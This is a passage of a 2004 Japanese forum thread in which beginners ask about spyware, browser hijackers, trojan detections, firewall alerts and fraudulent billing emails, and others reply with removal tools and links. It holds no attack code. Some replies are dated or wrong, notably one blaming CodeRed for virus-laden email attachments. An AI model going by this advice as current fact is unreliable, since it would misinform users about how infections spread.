ウィルスチェックや、 Ad-aware 6.0、Spybotでスキャン中に
PC本体から警告音(ピーピーって)が鳴ってしばらくすると
鳴り止むのですが、スキャン中には必ず一度は鳴ります。

何が原因なんでしょうか?

ちなみにブラウザをNetScapeに変えました。Operaの方がいいのですか?

331 :名無しさん@お腹いっぱい。:04/06/19 23:33
はじめてPCからウィルスが検出され
驚いています。
HTML_REDIR.Aという奴です。
こいつは簡単に言えばどんな悪事を働くんですか?
とりあえず、感染ファイルは削除しました
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_REDIR.A&VSect=T

332 :名無しさん@お腹いっぱい。:04/06/19 23:33
リモートホスト晒してしまいました。
浅はかでした。
リモートホストからはどの程度の個人情報がもれるのでしょうか。
教えて下さい。

333 :名無しさん@お腹いっぱい。:04/06/19 23:38
>>329
ありがとうございます。
プロパティを見たのですが どこを
見たらいいのでしょうか。今まで見てないので
よくわかりません。よろしく。

334 :名無しさん@お腹いっぱい。:04/06/19 23:44
>>332
ホスト名なんて気にしなくても良いんですが、 モデムの電源一度1分間切って → 電源投入
 (貴方のリモートアドレスは今のアドレスではなくなっています)


335 :334:04/06/19 23:45
 補足。
PCの電源を落とす必要はありません。(`・ω・´)シャキーン

336 :名無しさん@お腹いっぱい。:04/06/20 00:03
>>331
たしかブリッジみたいな奴でIEでしか発動しない奴だった思う。
そのウイルス事体には害はないが、
ウイルス対策ソフトなんかが入ってなく検出されないと、
強制的にアクティブXやexeなんかを実行させられるだっけかな。

くらうとPCがスパイウエアやウイルスで一杯になる。
たとえると最強に押しの強い訪問販売員。

ちなみにシマンテックだとこんな感じ。「MHTMLRedir.Exploit」
ttp://www.symantec.com/region/jp/sarcj/data/m/mhtmlredir.exploit.html

337 :名無しさん@お腹いっぱい。:04/06/20 00:07
>>334
ありがとうございました(^^)
今後気をつけます。

338 :名無しさん@お腹いっぱい。:04/06/20 00:11
>>334
アホーとかは、それでは無理だろ。

339 :名無しさん@お腹いっぱい。:04/06/20 00:14
>>334
ocnは大丈夫ですか?


340 :名無しさん@お腹いっぱい。:04/06/20 00:22
>>339
大丈夫。
いもむしモデム(黒色)でしょ?。 ← 大丈夫ですよ。

341 :名無しさん@お腹いっぱい。:04/06/20 00:25
>>338
YAHOO!なんか選んでいる奴が悪い。 
その事を知りながら入会しているんだから、、。

俺に言わないでくれ。 やふーなんて貧乏臭いモン、、ヽ(`Д´)ノ

342 :名無しさん@お腹いっぱい。:04/06/20 00:25
>>333
画面のプロパティ→設定
「画面の解像度」と「画面の色」

343 :名無しさん@お腹いっぱい。:04/06/20 00:34
教えてください。

OS→Win98se
ウィルスソフト→ウィルスバスター
Ad-aware 6.0、Spybotも使用しています。
ブラウザ→IE

です。

ブラウザを立ち上げると
最初の画面が
「about:blank」
に設定しているはずが、

「Search for..」という画面になって
ポップアップのウインドウで
「スパイウエアが入っているようなのでくりっくしなさい?」
みたいな英語のウインドウが出てくるのです。

それぞれ
スキャンをかけてみたのですが
何も検出されませんでした。


どうかお教えください。
よろしくお願いします。

344 :名無しさん@お腹いっぱい。:04/06/20 00:37
>>340
いも虫モデム??
分かりませんが、ご親切にありがとうございました☆

345 :名無しさん@お腹いっぱい。:04/06/20 00:43
最近無線LANを始めたのですが、ふと今NISを開いてみたら他者から頻繁に攻撃されているようです。
システムを軽くするためにNISを切る時もあるので、中が見られてたりしてないか
(((( ;゚Д゚)))ガクガクブルブルなのですが大丈夫でしょうか?
ルータ感の暗号化等はきちんと行っているのですが・・・・・・。


346 :名無しさん@お腹いっぱい。:04/06/20 00:45
>>343
青バックのポップアップだね?

347 :名無しさん@お腹いっぱい。:04/06/20 00:47
>>345
ファイルのやり取り(IN&OUT)と、攻撃と勘違いしていないの?。

348 :名無しさん@お腹いっぱい。:04/06/20 00:48
>>344
富士通製モデムの見た目の事です。
 プロバイダー板
【ACCA】IP電話用MODEM FA11-W3 Aterm 【26M】
ttp://pc6.2ch.net/test/read.cgi/isp/1065336625/

349 :名無しさん@お腹いっぱい。:04/06/20 00:50
>>347
ファイルのやり取りというと、普通にインターネットを見てて起こるものでしょうか?

350 :名無しさん@お腹いっぱい。:04/06/20 00:54
>>349
ウェブページを表示する為(ブラウザ上に)にはデータを受け取らなければならないので → 閉じきった状態では
 GoogleのTOPページにもアクセス出来ないよ。 MAILも受け取れないし。

351 :331:04/06/20 00:55
>>336
ありがとうございました。
やはり無料アダルトサイトがいけなかったようです(汗


352 :名無しさん@お腹いっぱい。:04/06/20 00:57
・・・・あれ、てことは NIS→統計→ファイアーウォール に「最近の侵入の試み」って
赤字であるのは問題ないんですか?だとしたら・・・・・・安心です。

353 :名無しさん@お腹いっぱい。:04/06/20 01:06
>>352
何て警告している?

354 :名無しさん@お腹いっぱい。:04/06/20 01:09
>>346様 ありがとうございます

ポップアップの方は
4種類くらいあって
ブラウザを立ち上げると
「about:blank」の方は「Search for..」の画面に
ポップアップの方は
青バックではなく、「スパイウエアが入っているようなのでくりっくしなさい?」
というようなことが表現を変えて英語で
でるのです。
 ご教授くださいぺこ <(_ _)>

355 :名無しさん@お腹いっぱい。:04/06/20 01:10
そういや特に警告はないですね。
どうやら早とちりだったようです。お騒がせして申し訳ない。

356 :名無しさん@お腹いっぱい。:04/06/20 01:13
354です
ホームページがどうも↓の文字が青色版?に変更されてしまうのです
http://s1di.ewizard.cc/

IEのプロパティ上では「about:blank」のままなのです
気味が悪いです(ToT)

357 :名無しさん@お腹いっぱい。:04/06/20 01:18
http://higaitaisaku.web.infoseek.co.jp/index.html

358 :333:04/06/20 03:30
>>342
ありがとうございます。
調べてみたら 画像の領域が640×480ピクセルで
ボタンをドラッグできません。固定されてる様です.
これが悪いのでしょうか?どうしたらいいのでしょうか

359 :名無しさん@お腹いっぱい。:04/06/20 04:04
身に覚えの無いサイトに、私のアドレスが登録されてしまったようで(有料)、メールで請求がきました。無視してたら、
葉書まで届いてしまって...。このまま無視すると自宅まで来ると、脅迫されてます。このまま、無視しても平気ですか???

360 :名無しさん@お腹いっぱい。:04/06/20 04:16
>>359
身に覚えのないサイトなのでしたら、「無視」です。それ以外の
選択肢はあり得ません。

さて、どうして、>>359 さんのメールアドレスと住所がセットで同時に
相手(犯人)に知られてしまったのでしょうか。それが問題です。
どこかで情報漏洩があるのでしょうか?
さっさとアドレスを捨ててしまうのが吉、かもしれませんでつ。
葉書は、捨てずに保存しておきましょう。後日の紛争がもしあったときに
脅迫の事実を証明する証拠として有効でつ。

361 :名無しさん@お腹いっぱい。:04/06/20 06:25
>>359
メールで詐欺請求がくるのは珍しくもないのですが、同じ業者がハガキでも
送ってくるようなら個人情報が漏洩している可能性が大です。
とりあえずは無視。もし電話がかかってくるようなら警察に相談しているところだと
はっきり言ってください。もしもお金を一度でも払ったら今度はその情報が悪徳業者間で
行き渡りいろんな詐欺請求が来ます。

362 :名無しさん@お腹いっぱい。:04/06/20 09:29
愛用していたBrowserCrasherChecker
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/ のホームページが
閉鎖されていて困っています。
皆様、お奨めのページをひとつ教えてください。

それと、チェックのソフトなんてあるのですか?

363 :名無しさん@お腹いっぱい。:04/06/20 09:52
>>362
ttp://www.7walker.com/so/

俺はここ使ってるよ。

364 :名無しさん@お腹いっぱい。:04/06/20 09:59
PFWが、pingをブロックしましたみたいなメッセージを出してきたのですが、
送信元送信先IPを見ると、モデムから内側のIPっぽいのです。
(モデムの設定の説明書に書いてあったIP)
これって、モデムが自動的に何かの情報を得るためにPCに送ってきたのでしょうか?
それとも、ネットからモデム経由する時にIPが変換されてPCに来たのを防いだという事でしょうか?
PCの調子が良くなくて、メッセージが出た後にフリーズしてしまったので再起動してログとかは残念ながら残っていないのですが、
何か分かる方教えて下さい。

365 :名無しさん@お腹いっぱい。:04/06/20 10:02
>358
[詳細設定]をクリックして、ディスプレイドライバを確認する。

366 :名無しさん@お腹いっぱい。:04/06/20 10:15
http://040035.fc2web.com/nasaki/nasaki.html

367 :名無しさん@お腹いっぱい。:04/06/20 10:30
>>362
これ使っています。
【右クリックランチャー】
http://f99aq.hp.infoseek.co.jp/rlaunch.html
なかなか便利です。
だたし生成されるクッキーがAd-awareにかかってしまいますが、
私はそのまま使っています。

368 :名無しさん@お腹いっぱい。:04/06/20 10:40
Windows XP Home Editionを使用しています。
先日、Outlookを起動したら、受信・送信トレイやアドレス帳などのデータが全て消えていました。
ウイルスバスターでスキャンしたら、テンポラリファイルの中でSUARA.jpgというファイルがウイルス反応を示しました。

初めて見るウイルスファイルの名前なので検索をかけて調べてみたものの詳しい情報がまったく分かりません。
どなたかご存知の方はいませんか?

369 :名無しさん@お腹いっぱい。:04/06/20 11:09
なんかセキュ板の奴って知識誇示してるけど実際UNIX板の奴ら方が
ぜんぜん技術も知識もある。セキュ板でまともなやつでもただ知識があるだけじゃねえか。
それで自称プロみたいなノリだもんな。氏ね

370 :名無しさん@お腹いっぱい。:04/06/20 11:12
ちなみになんで藪パソは嫌われてるんだ?嘘を振りまきまくってたのか?
あと蒙古っていう嵐もいたな

371 :名無しさん@お腹いっぱい。:04/06/20 11:15
>>369
愚痴ですか

372 :名無しさん@お腹いっぱい。:04/06/20 11:18
>>371 率直な感想だよ。現にいないじゃん。そういう奴。
そのくせ初心者相手に知ったかするし。ただセキュリティ関係の
ソフトが使える程度の話しかされてないじゃん。セキュ板。
しかもここの住人はいたいところ突かれるとすぐ論点ずらして
必死だなとかそういうことしかいえないからな。ちょうどお前みたいに

373 :名無しさん@お腹いっぱい。:04/06/20 11:20
>>368
何というウイするに感染してたの?

374 :名無しさん@お腹いっぱい。:04/06/20 11:24
>>372 それはセキュ板の流れの問題だから仕方ないだろ。

375 :名無しさん@お腹いっぱい。:04/06/20 11:25
すいません。教えていただけますでしょうか?
どこかでSPYを拾ってしまったようなのですが
SPYBOT,AD-AWAREで除去しようとしてもとれません。
具体的にはIEのスタートに「SERCH FOR」と言ったページが表示されるもので
(ベンダー:COOLWEBSERCH)
「スパイウエアが仕込まれてるぞ」みたいなポップアップが表示されます。
またかちゅーしゃのレス表示画面にもその「SERCH FOR」のページが
表示されます。AD-AWAREで検索するとひっかかるので一旦は
除去するのですがIEを開くとまた復活してしまいます。
もちろんAD-AWAREのアップはしましたしIEのスタートは
ブランクにしてあります。
これを完全に除去するにはどうしたらいいんでしょう?

376 :368:04/06/20 11:28
>373
ウイルス名は分かりません。SUARA.jpgというファイルが反応しただけです。
このファイルのせいでOutlookのデータが消えたのだと思いますが・・・

377 :名無しさん@お腹いっぱい。:04/06/20 11:59
タスクマネージャを見るとCIDEMON.EXEというのがいつの間にか
動いていて停止できません。これって怪しいですか?
OSはWindows2000で、ADSL接続です。

378 :名無しさん@お腹いっぱい。:04/06/20 12:07
>>376
バスターだと感染ウイルス名が表示されませんか?
他のソフトやオンラインスキャンの結果はどうですか?

379 :368:04/06/20 12:14
表示されませんでした・・・

380 :名無しさん@お腹いっぱい。:04/06/20 12:25
>ウイルスバスターでスキャンしたら、テンポラリファイルの中でSUARA.jpgというファイルがウイルス反応を示しました。

そのファイルが反応したならそのウイルス名も表示されるはずです。
ファイル名≠ウイルス名。
ファイルはもう削除なさったんですか?まだあるのならもう一度スキャンして
そのウイルス名を頼りに調査してみてください。

381 :名無しさん@お腹いっぱい。:04/06/20 12:30
>>377
綴りあってる?

382 :名無しさん@お腹いっぱい。:04/06/20 12:49
AVGで次のように表示されました。

Virus
Trojan horse BackDoor.Agent.BA
is found in file
C:\WINDOWS\system32\sqlmnnm.dll

でも、セーフモードで立ち上げるとsqlmnnm.dllは見つからないので削除できません。
このウィルスを削除するにはどうすればいいですか?


383 :名無しさん@お腹いっぱい。:04/06/20 12:50
>>368
俺も消えました。ええ、きれいさっぱり。
昨夜までなんでもなかったのに、今朝起動したら受信メール、アドレスみんなあぼ〜んしていました。
NAV2004では何も検出されず、システムの復元もだめ・・・もうあきらめようかな。

384 :名無しさん@お腹いっぱい。:04/06/20 12:53
>>377
cideamon.exeだろw それならWindowsのインデクシングサービスの実体。
全部のファイルにインデックスをつけている最中。cisvc.exeとペアで仕事
してるはずだから探して見れ。


385 :名無しさん@お腹いっぱい。:04/06/20 12:58
俺も消えました。ええ、きれいさっばり。

386 :名無しさん@お腹いっぱい。:04/06/20 13:09
>>382
他のオンラインスキャンとかでも同じ結果が出る?

それとa2っていうトロイに特化したものがあるからこれ使ってみるとか
http://www.emsisoft.com/en/

387 :377:04/06/20 13:51
>>384
その通りでし。CISVCというのもありました! それじゃほっといて
おいていいんですね? でもどうして最近になって出てきたんだろ?


388 :名無しさん@お腹いっぱい。:04/06/20 13:55
eAc1Abe0**.osk.mesh.ad.jp

こいつ、しつこくポートスキャンしてくるんだけど、
地域どこか分かる方いますか?
知り合いのような気がするんだけど、場合によってはそいつを問い詰める。

389 :名無しさん@お腹いっぱい。:04/06/20 13:59
>>388
eacess大阪biglobe

390 :名無しさん@お腹いっぱい。:04/06/20 14:00
>>389
ドキュンな文章書く奴に知恵つけてどうするよ。

391 :388:04/06/20 14:15
>>389
ありがとうございました。

>>390
お氏ねでございます。

392 :名無しさん@お腹いっぱい。:04/06/20 14:26
>>386
使ってみました。それでは検出されませんでした。
トレンドマクロのオンラインスキャンでも検出されませんでした。
でも、AVGはたびたび怒ってきます。

日本でググっても情報はなく、英語でググってみると若干情報がありました。
どうも、新種みたい。
けど、英語が分からないので、削除の仕方が分かりません・・・。

very very strangeというのが不気味・・・。


393 :名無しさん@お腹いっぱい。:04/06/20 14:40
誰か>>364の回答お願いします。
この情報だけじゃ無理かなあ。。。


394 :名無しさん@お腹いっぱい。:04/06/20 14:45
>>393
192.168.0.1

395 :名無しさん@お腹いっぱい。:04/06/20 15:37
>>392
IEのホームページが変更されてるとか
その他の自覚症状はないのか?

396 :名無しさん@お腹いっぱい。:04/06/20 15:43
>>375
http://higaitaisaku.web.infoseek.co.jp/removecws.html

>>376
名前と症状からこれっぽい気もするけど・・・
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A

>>392
駆除ツールStinger
http://www.nai.com/japan/security/stinger.asp

あとAd-awareやSpybotやってみてください
ここのテンプレ読めばわかります

エロサイト見てたら…助けてください! part29
http://pc6.2ch.net/test/read.cgi/pcqa/1087573951/


397 :名無しさん@お腹いっぱい。:04/06/20 16:35
>>394
えーとすいません、それは一体どういう事なんでしょうか?

398 :名無しさん@お腹いっぱい。:04/06/20 17:01
>>396
対策、ありがとう。
stinger,Spybot,CWShredderでは駆除できませんでした・・・。
対策が出るまで、飼ってみます・・・。

399 :名無しさん@お腹いっぱい。:04/06/20 17:26
>>398
それなら396のエロサイトスレに行って、やったこと、状況詳しく書いて
HijackThisのログ取って鑑定人に見てもらう

400 :名無しさん@お腹いっぱい。:04/06/20 17:43
>>398
「search for」が流行なのか・・・手ごわいみたいね。
この人は、これで解決したらしい。
http://pc5.2ch.net/test/read.cgi/sec/1083759490/372-374
ここにも殲滅方法が・・・
ttp://okweb.jp/kotaeru.php3?q=871865
あなたもがんばって。結果報告ヨロシク。

401 :名無しさん@お腹いっぱい。 :04/06/20 18:14
専ブラでアクセスしたら、VBS.LoveLetterのウイルスをファイアウォール。
2ちゃんではマイナーなウイルス?

402 :名無しさん@お腹いっぱい。:04/06/20 18:17
>>400
上の方法は確かに有益なんだけど、
改ざんされたレジストリを無視してトロイを強制的に削除するようなものだから、
完全に改善されたとは言わないんじゃないかな?

それで症状がでなければ万事オッケーだが、
初心者はスパイウエアの元になっているexeやdllを見つけるのも大変だろうし、
巻き沿いで大事なファイルもごみ箱に入れかねないよそのやり方。

クルクルやRapidBlasterがシステムファイルに化けた時は、
そうなる可能性がとくに高くなるような気がする。
確かに試す価値はありますが・・・。

403 :名無しさん@お腹いっぱい。:04/06/20 18:27
>>401
ウイルスコードが書き込まれてるだけでは?

404 :名無しさん@お腹いっぱい。 :04/06/20 18:35
>403
即レスありがとう、2ちゃん来て以来初めてのファイアウォール。
ログだけです、遮断しました。他の人も警告出たことありますか?

405 :名無しさん@お腹いっぱい。:04/06/20 18:40
>>404
ただの誤反応

406 :名無しさん@お腹いっぱい。:04/06/20 18:40
>>404
バスターは反応しないけど、ノートンは反応するみたいです。


407 :名無しさん@お腹いっぱい。 :04/06/20 18:42
了解!!帰ります。

408 :名無しさん@お腹いっぱい。:04/06/20 18:42
>>402
たしかに危険なんだけどね・・・
ttp://okweb.jp/kotaeru.php3?q=871865を先に書けばよかったと思う。
もしこれでも改善されないならSpybotやAd-awareはおろかCWShredderでもだめだとなると
強引な方法しかないんじゃないのかと思ったもので・・・
たしかにレジストリにごみが残るかもしれないけど本体を削除してしまえば
うまくいく可能性もあるし、なにより他スレ372はこの方法で成功したと報告していたからね。

409 :名無しさん@お腹いっぱい。:04/06/20 19:06
>>400
Search forにも感染しましたが、それはCWShredderで簡単に削除できました。
今回のヤツは、セーフモードだと対象ファイルが消えるんだよ〜〜〜。
まるで忍者だ。

410 :名無しさん@お腹いっぱい。:04/06/20 19:20
>>409
通常モードで起動して、強制削除ツールで削除したら?


411 :名無しさん@お腹いっぱい。:04/06/20 19:45
普通に自宅でADSLモデムから直接LANで繋いだパソコンからアクセスしています。
ルータが無いのでチョット心配です。
ノートンとウイルスバスターではどっちが良いのですか?

412 :名無しさん@お腹いっぱい。:04/06/20 19:49
>>411
ノートンは一度不具合出だすと回復させるの大変だから、気軽に使えるバスターの方がマシ、、。

 アンチウイルスSOFTと、ファイヤーウォール専門のSOFTを分けて使う方が良いとは思うけど。
 相性の問題は2chで質問してみたら良い。

413 :名無しさん@お腹いっぱい。:04/06/20 19:57
>>412
どうもありがとうです。
じゃあウイルスバスターにします。

414 :名無しさん@お腹いっぱい。:04/06/20 20:00
>>413
そうした方が費用も少しだけ抑えれるし、ウイルスの対応力も変わらないので不満は出ないと思います。

415 :名無しさん@お腹いっぱい。:04/06/20 20:09
>>410
強制削除ツールってありますか?
いろいろ探してみたけど、適当なモノが見つからなかった。

セーフモードで同名のファイルを作ってみたらどうなるかと思ったら、
そのファイル名がないのに「存在する」と言われて作れなかった。
エクスプローラやコマンドプロンプトのdirで確認したりしたんだけど、どうみても存在しない。

HijackThisでもいろいろ消してみたけど現象は変わらず・・・。

ま、暇が出来たらクリーンインスコします。
ヽ(`Д´)ノウワーン


416 :名無しさん@お腹いっぱい。:04/06/20 20:17
>>415
Dellater
http://www.diamondcs.com.au/index.php?page=dellater

下は☆☆トロイの木馬☆☆スレ191さんの説明。

@ダウンロードしたzipを解凍して中のdellater.exeのショートカットをデスクトップに作る。
Adellater.exeへのショートカットを右クリックしてプロパティを表示
Bリンク先となっているところ
  〜〜dellater.exe"の右に半角スペースを空けて消したいファイルのパスを入れる。
 たとえば消したいファイルのパスがC:Windows\System32\strings.batだったら
〜〜dellater.exe" C:Windows\System32\strings.bat
のように入れる。
Cそれからdellater.exeへのショートカットをダブルクリックして再起動。

そうすれば実行中で削除できないファイルも消せます。

417 :名無しさん@お腹いっぱい。:04/06/20 20:19
>>415
諦めてBEERの味を悪くするのもアンタの考え一つだよ。

418 :名無しさん@お腹いっぱい。:04/06/20 20:33
>>415
Windowsフォルダ以下なら、回復コンソール使え

419 :名無しさん@お腹いっぱい。:04/06/20 20:36
>>418
メーカー製のPCは、回復コンソールを入れる事は、マズ間違い無く出来ませんよ。

420 :名無しさん@お腹いっぱい。:04/06/20 20:45
>>419
セットアップ起動ディスクを使えばいいべ。バカの癖に。

421 :名無しさん@お腹いっぱい。:04/06/20 21:04
>>416
ありがとう。
やってみたけど、dllは削除マーク付けて起動時に削除するのね。
BackDoor.Agent.BAは、起動時にウィルスdllを再生成しているみたいで、
削除できませんでした。。。
(セーフモードで消えてるから、起動時に何かしてるとは思った)


422 :名無しさん@お腹いっぱい。:04/06/20 21:15
>>418
サンクス、それで削除できましたヽ(´▽`)ノ
ツールを使うことに慣れて、基本を忘れてました。。。

たぶん、大本の犯人(起動するヤツ)は別にいるんだろうけど、
AVGは怒ってこなくなったし、別にいいや。

423 :名無しさん@お腹いっぱい。:04/06/20 21:47
>>420
それには回復コンソール入ってねーんだよ。>>420貧乏人の息子

424 :名無しさん@お腹いっぱい。:04/06/20 21:59
IE6.0を使っています。
噂に聞いてた「about:blank(search for...)」になってしまったのですが,
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html
を参考になんとか復旧しました。spybotでは直らなかったのですがこれはスパイウェアではないのですか?

もうひとつ,IEのツールバーの検索をクリックしたときに画面左に出る検索画面ですが,
これが変な英語の検索になってしまいました。
IEの設定をリセットしたら直ったのですが,これはやはりスパイウェアなのですか?
初心者なのですがよろしくお願いします。

425 :名無しさん@お腹いっぱい。:04/06/20 22:04
>>424
CWShredderで削除できます。
spybotがまだ対応していないらしい。

英語の検索は分かりません。
ごめんなさい。

426 :名無しさん@お腹いっぱい。:04/06/20 22:08
>>423
おめえのようなバカがレベルを一段と引き下げてんだよ。
おまえにはサポートは無理だから、もう来んな!
めん玉良くかっぽじって見ろ!
http://support.microsoft.com/default.aspx?scid=kb;JA;307654

427 :名無しさん@お腹いっぱい。:04/06/20 22:10
IE6.0、ウイルスバスターを使っています。
次のような質問でも良いか少し不安ですが、よろしければ
ちょっと教えていただけたらと
思いまして宜しくお願いします。(場違いだったらすみません)
チャットのサイトでチャットをすると、
こちらのパソコンの情報(プロバイダ、IP?)って
チャットしている相手って分かりますか?
そういう情報が画面に載るチャットだと分かると思いますが
そうでないところでも何かソフトなどで(管理人でなく)チャット相手に
情報を盗まれることはあるのでしょうか?
宜しくお願いします・・・。


428 :名無しさん@お腹いっぱい。:04/06/20 22:22
>>427
チャット相手がおもむろに貼り付けたURLを踏むという典型的なIP漏れが考えられるね。
http://www.ugtop.com/spill.shtml
ここで表示される情報以上のことがAGENT情報としてサーバ側に渡ってるよ。

429 :名無しさん@お腹いっぱい。:04/06/20 22:34
>>426
まあ餅つけって。俺自身そういうPC買ったことないから不思議に思ったこと
もあったんだが、メーカーによっちゃシステムとは別のパーティションにGhost
なんかで作ったリカバリイメージを保存してあるだけでリカバリCDさえついて
ない場合があるらしいのよ。Windows機なのにWindowsのCD付けてないって
のは問題あるとおもうんだが、ユーザーにとっちゃしかたないわな。



430 :名無しさん@お腹いっぱい。:04/06/20 22:35
*****ウィルスチェックサーバ(=belle)は、
あなた(自分のアドレス)から受信者(相手のアドレス)へ
送信されたメールに添付されていたファイルを破棄しました。
理由:添付ファイルに実行形式ファイル(your_details.pif)が含まれています。
セキュリティ上、本学メールサーバは、
「.exe」等の実行形式ファイルの送信を禁止していますのでご注意ください。
なお、ファイルの拡張子が偽装されている場合も同様です。
こんなメールがきたんだけどウィルスチェックしても感染してないんだけどどうなの?

431 :名無しさん@お腹いっぱい。:04/06/20 22:40
>>429
Windows XP セットアップ ブート ディスクの入手法
http://support.microsoft.com/default.aspx?scid=kb;JA;310994

まだ勘違いしてるべさ
フロッピーディスク6枚の方だよ。

432 :430:04/06/20 22:40
OSはXPでノートン使ってます。

433 :≠427:04/06/20 22:42
>>428 それ、答えになってないです。
管理人でないチャット相手に漏れることはないですね?

434 :名無しさん@お腹いっぱい。:04/06/20 22:43
>>430
相手がCodeRedに感染してる。
メールを発信しようとしたけど、SMTPサーバーがチェックして止めたんだよ。

CodeRedは感染者が分からないからなぁ。
誰か気づくまで待つしかない。

届いたぁゃιぃメールは絶対に添付をオープンしないこと。
添付を開くと、Outlookでなくても感染するよ。

435 :430:04/06/20 22:47
>>434
他にもメールを見るとメールデリバリーが
いっぱいあるのですが心配ないですか?

436 :名無しさん@お腹いっぱい。:04/06/20 22:52
>>435
メールデリバリー

437 :名無しさん@お腹いっぱい。:04/06/20 22:55
>>431
すまん。俺が悪かった。

438 :430:04/06/20 22:56
>>すぐ消すので英語がわからないんですが、
差出人か件名が英語でメールデリバリー?
ってなってるんですけど…。
以前相手のアドレスが間違ってた
ときに帰ってきたメールと同じなんですけど。

439 :名無しさん@お腹いっぱい。:04/06/20 23:00
>>438
あなたのPCがウイルス感染していて、知らないうちに
ウイルス付のメールが送られていたのでは?


440 :名無しさん@お腹いっぱい。:04/06/20 23:02
>>438
添付ファイルをスキャンしたらswenウイルスとかを検出するんじゃない?
だったら無視するしかないよ。

俺もメル友多いからメールデリバリーいっぱいあるよ!英語苦手なの?

441 :430:04/06/20 23:04
>>439
ノートンのオンラインでウィルスチェックしても
感染してないんです。

442 :名無しさん@お腹いっぱい。:04/06/20 23:06
>>438
定義ファイル更新して完全スキャンしてウィルス発見されないのなら、
擬装にアドレス使われてるってことだね

443 :430:04/06/20 23:09
>>442
心配無しですか?

444 :名無しさん@お腹いっぱい。:04/06/20 23:10
>>443
PCの感染をチェックして問題ないんでしょ?
メールの添付ファイルをスキャンすればウイルスかどうかは分かりますよ。

つーか、ちょっとは、お勉強しなさいね。

445 :430:04/06/20 23:14
>>444
それはわかるんだけどブラウザ上で
メール確認しているんでとりあえず怪しいメールは
全部消してるんですけどあまりにもメールデリバリー
が多いのでどうなのかと思いまして

446 :名無しさん@お腹いっぱい。:04/06/20 23:17
>>445
だからメールデリバリーが多いって・・・英語苦手なの?

デリバリーエラーのメールが多いんでしょ。

447 :430:04/06/20 23:20
英語苦手です。

448 :名無しさん@お腹いっぱい。:04/06/20 23:25
>>447
心配ないというか、打つ手なしというか。
うちにもそういうメールはよく来ます。
あなたとあなたのアドを知ってるすべての人のPCから
ウイルスを殲滅させれば来なくなるかもしれません。

449 :430:04/06/20 23:28
>>448
わかりました。ありがとう。

450 :名無しさん@お腹いっぱい。:04/06/20 23:34
インターネットって小学生もやるのか。あまりよくないよね。

451 :名無しさん@お腹いっぱい。:04/06/20 23:43
上の方でワームの質問をした者です
ワームはどうやら嘘だったみたいなのですが、今度は

検索エンジン対策してるサイトにダイレクトアクセスしたから
鯖ログ公開依頼かけて法律で裁く。海外じゃ未成年でも禁固刑だし、国内は最高で懲役3年だぞ

て言われてしまいました。私は違法行為をしてしまったのでしょうか?

452 :名無しさん@お腹いっぱい。:04/06/20 23:47
>>451
杞憂

453 :名無しさん@お腹いっぱい。:04/06/20 23:51
>>451
上の方って何番?

454 :名無しさん@お腹いっぱい。:04/06/21 00:57
アンチウイルスってレジストリの修復(値の削除)までするんですか?
それともファイル削除だけ?もしそうならド素人がウイルスにやられた日にゃ
終わりでしょ?

455 :名無しさん@お腹いっぱい。:04/06/21 02:29
ファイヤーウォールを昨日入れて、初めてpingってのが来ました。
PCはメールと2ちゃんと信用出来るサイトくらいしか行かないので、
ウイルスや攻撃なんかとは全く無縁な感じなのですが、
pingってどのくらいヤバイんですか?今まではそれが素通りしてPCに来てたって事ですよね?
PC内のファイル見られたり盗まれたり壊されたりしてるんですか?
怖くて泣きそうです。

456 :名無しさん@お腹いっぱい。:04/06/21 02:52
スパイボットとad-awareいれてるのですが
これはスキャンしないとウイルス撃退できないのですか?
それとも入ってきた時点で隔離してくれたりするんでしょうか?


457 :名無しさん@お腹いっぱい。:04/06/21 04:06
>>456
スパイボットはスパイウェア除去だからスキャンしてもウイルスは撃退できないよ。
スパイウェアは「免疫化」すればある程度は防げる。

458 :457:04/06/21 04:07
ad-awareもそう。スパイウェア対策用。

459 :名無しさん@お腹いっぱい。:04/06/21 05:01
2日ほど前ウィルスにかかり、
かかった時から必ず、Windows起動時に、
「Chintcaiが原因で、Msgsry32が原因で、Osaが原因で<不明>にエラーが起きました。」と、
3、4つエラーログが出るようになりました。
Msgsry32が原因(ry のログに限っては、何度OKタブを押してもエンドレスに消えず、
最終的にExprorerにエラーが出て、強制終了。か、5秒押し。
普通に起動しても、インターネットを繋ぐことも出来ないので、
起動したと同時に段々出てくるChintcai(その他上記の2つ)を
Ctrl+Alt+Deleteで強制的に消し、とりあえずまともにアプリケーションを起動出来るまでにして、
何とか2ちゃんまでに辿りつけたのですが・・・

一応全て駆除、削除したはずなんですが、まだそれでも全く変化はありません。
これはまだウィルスが残っていて、
そのウィルスの仕業ですか?検索を掛けて駆除、削除したのはウィルスバスターなんですが・・・
最新過ぎるウィルスは検索しても掛からないのとかあるんでしょうか?
ウィルスの最新定義のアップデートもしたと思います。
それか、ウィルスは完全に根絶されたけど、
そのウィルスのシステム破壊工作の残骸がまだ残ってるんでしょうか?
TRO何とかって言う、
まだトレンドマイクロにも載っていないウィルスだったみたいなんですが・・・・
教えてください。


460 :名無しさん@お腹いっぱい。:04/06/21 05:10
>>459
その削除したウイルス名は解りませんか?
>TRO何とかって言う、
>まだトレンドマイクロにも載っていないウィルスだったみたいなんですが・・・・
その情報はどこで?


461 :名無しさん@お腹いっぱい。:04/06/21 05:31
ヤフーBBのサービスのなかにある、セキュリティシステムは
つかいものになりますか?
なお、私が使用しているOSはwindows−MEです。
よろしくお願いします。


462 :名無しさん@お腹いっぱい。:04/06/21 05:40
MACは安全ってよく聞くんスけど本当すか?

463 :名無しさん@お腹いっぱい。:04/06/21 05:51
>>460
すいません、ウィルスバスターで自動的にログ取ってました。
TRO J_SMALLFOと言う名前でした。
情報は、上記のウィルス名で検索してみたところ
2chのログしか掛からず、どのログも必ず、
「そのウィルスはまだ発表されてない。」というレスが返ってたので。
実際自分でシステマック、トレンドマイクロで検索しても最新ウィルス情報にもなく、
検索にも掛からなかったのでそう判断しました。


464 :463:04/06/21 06:02
すいません、再度確認したら、
TRO J_SMALL.FO でした。

465 :463:04/06/21 06:14
スレ汚しすいません。
.FOのほうは確かトレンドマイクロに載っており、対処しました。
TROJ_SMALL.KR が、検索してもトレンドマイクロでも対処方法や発表をまだしてませんでした・・・。

466 :名無しさん@お腹いっぱい。:04/06/21 06:26
>>465
TROJ_SMALL.FO & TROJ_SMALL.KR(こっちは新しいやつ)
